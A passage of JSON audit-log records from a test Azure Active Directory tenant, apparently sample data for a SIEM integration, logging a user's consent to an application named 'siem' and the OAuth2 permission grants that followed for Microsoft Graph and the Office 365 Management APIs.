{"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", 
"Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": 
"ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": 
"asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": 
"additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 